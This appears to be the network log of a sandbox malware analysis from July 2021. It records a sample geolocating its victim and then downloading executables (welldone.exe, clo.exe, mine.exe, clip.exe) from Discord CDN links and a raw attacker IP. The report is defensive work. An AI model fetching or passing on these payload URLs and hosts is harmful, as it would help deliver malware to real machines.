Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| ocsp.digicert.com |
CNAME
cs9.wac.phicdn.net
|
117.18.237.29 |
| api.ip.sb | 104.26.13.31 | |
| cdn.discordapp.com | 162.159.129.233 |
- TCP Requests
-
-
192.168.56.102:49191 117.18.237.29:80ocsp.digicert.com
-
192.168.56.102:49192 117.18.237.29:80ocsp.digicert.com
-
192.168.56.102:49189 162.159.129.233:443cdn.discordapp.com
-
192.168.56.102:49190 162.159.130.233:443cdn.discordapp.com
-
192.168.56.102:49163 172.67.75.172:443api.ip.sb
-
192.168.56.102:49172 45.137.190.166:80
-
192.168.56.102:49161 95.217.159.87:4348
-
- UDP Requests
-
-
192.168.56.102:58318 164.124.101.2:53
-
192.168.56.102:60922 164.124.101.2:53
-
192.168.56.102:62770 164.124.101.2:53
-
192.168.56.102:63203 164.124.101.2:53
-
192.168.56.102:65038 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:62773 239.255.255.250:1900
-
GET
200
https://api.ip.sb/geoip
REQUEST
RESPONSE
BODY
GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 04:57:15 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 347
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f797c2HVG3lr7jD4sSFnkgM%2B9v5n3kBigfurixTJm2z8kk0REImoaoQgSSiKJCN10AEHAYwVNzq5N9Y1W3K8qpNDjNgGiweO%2B5mLvw8AzhFO50AUMti%2Bgx6gkw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 67743ead781a0ad6-KIX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
GET
200
https://cdn.discordapp.com/attachments/868908533897363470/870626065511501945/welldone.exe
REQUEST
RESPONSE
BODY
GET /attachments/868908533897363470/870626065511501945/welldone.exe HTTP/1.1
Host: cdn.discordapp.com
Accept: */*
HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 04:57:37 GMT
Content-Type: application/x-msdos-program
Content-Length: 644096
Connection: keep-alive
CF-Ray: 67743f394edf12f2-ICN
Accept-Ranges: bytes
Age: 61164
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=welldone.exe
ETag: "4ee1fe5a7eae87277c898e6c98757e18"
Expires: Sun, 31 Jul 2022 04:57:37 GMT
Last-Modified: Fri, 30 Jul 2021 11:17:09 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1627643829532942
x-goog-hash: crc32c=SE6R2w==
x-goog-hash: md5=TuH+Wn6uhyd8iY5smHV+GA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 644096
X-GUploader-UploadID: ADPycduu1Hyl4KfH4ZDbwmS4YaVqLb6ZXojoHgbkuJ_NJeIOg6_bvS08QQW8imTgQR1LQDj7QZS3AHpTag0kkHW8tRY
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k9MGbg5A9%2FoJLvQOSgVMnduG1QilHxg4DrqP42prgRHjDT0LE1aYsjhUh%2BYBb0Qli8D8sRBJPNkDKBsut8A7O7pHHbje%2BORfU0r9TsMxbUz4ougmPM9ptPt7i14fuKPP4%2ByxIg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/868908533897363470/870626071547097128/clo.exe
REQUEST
RESPONSE
BODY
GET /attachments/868908533897363470/870626071547097128/clo.exe HTTP/1.1
Host: cdn.discordapp.com
Accept: */*
HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 04:57:37 GMT
Content-Type: application/x-msdos-program
Content-Length: 55296
Connection: keep-alive
CF-Ray: 67743f395ef712f2-ICN
Accept-Ranges: bytes
Age: 61163
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=clo.exe
ETag: "296968fa478ce8b4832446c33afc37a5"
Expires: Sun, 31 Jul 2022 04:57:37 GMT
Last-Modified: Fri, 30 Jul 2021 11:17:10 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1627643830935637
x-goog-hash: crc32c=lvifUA==
x-goog-hash: md5=KWlo+keM6LSDJEbDOvw3pQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 55296
X-GUploader-UploadID: ADPycdvvWAxklEGnlFy54UXepi3h8q-XiFnC592niitm3GlwJowT9CFj7NyM72ilgCGoYbAM3w66fMoqRtHEtDJruAg
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GPFVXN9J0Q%2FyRmn01BpZGdEQwWeon7mQHA2pQw4IU9v7xneuzXhAZtLzeUPR271pjF28TC1hzVA2VQWIcFVDB7Xq1xy2d2yJVEqCxVpm%2BqgWdK3Bu6InkRIGNwiNFPuCGSPP4w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
http://45.137.190.166/mine.exe
REQUEST
RESPONSE
BODY
GET /mine.exe HTTP/1.1
Host: 45.137.190.166
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 04:57:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 30 Jul 2021 11:34:54 GMT
ETag: "6fa00-5c8559bc7ca73"
Accept-Ranges: bytes
Content-Length: 457216
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET
200
http://45.137.190.166/clip.exe
REQUEST
RESPONSE
BODY
GET /clip.exe HTTP/1.1
Host: 45.137.190.166
HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 04:57:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 30 Jul 2021 11:35:47 GMT
ETag: "6fa00-5c8559ee88691"
Accept-Ranges: bytes
Content-Length: 457216
Content-Type: application/x-msdos-program
GET
200
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4881
Cache-Control: max-age=148010
Content-Type: application/ocsp-response
Date: Sat, 31 Jul 2021 04:57:37 GMT
Etag: "6104645a-5e3"
Expires: Sun, 01 Aug 2021 22:04:27 GMT
Last-Modified: Fri, 30 Jul 2021 20:43:06 GMT
Server: ECS (tkb/73A0)
X-Cache: HIT
Content-Length: 1507
GET
200
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D
REQUEST
RESPONSE
BODY
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 5103
Cache-Control: max-age=148232
Content-Type: application/ocsp-response
Date: Sat, 31 Jul 2021 04:57:37 GMT
Etag: "6104645a-5e3"
Expires: Sun, 01 Aug 2021 22:08:09 GMT
Last-Modified: Fri, 30 Jul 2021 20:43:06 GMT
Server: ECS (tkb/72B1)
X-Cache: HIT
Content-Length: 1507
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.102:49163 172.67.75.172:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e |
|
TLS 1.2 192.168.56.102:49190 162.159.130.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78 |
|
TLS 1.2 192.168.56.102:49189 162.159.129.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78 |
Snort Alerts
No Snort Alerts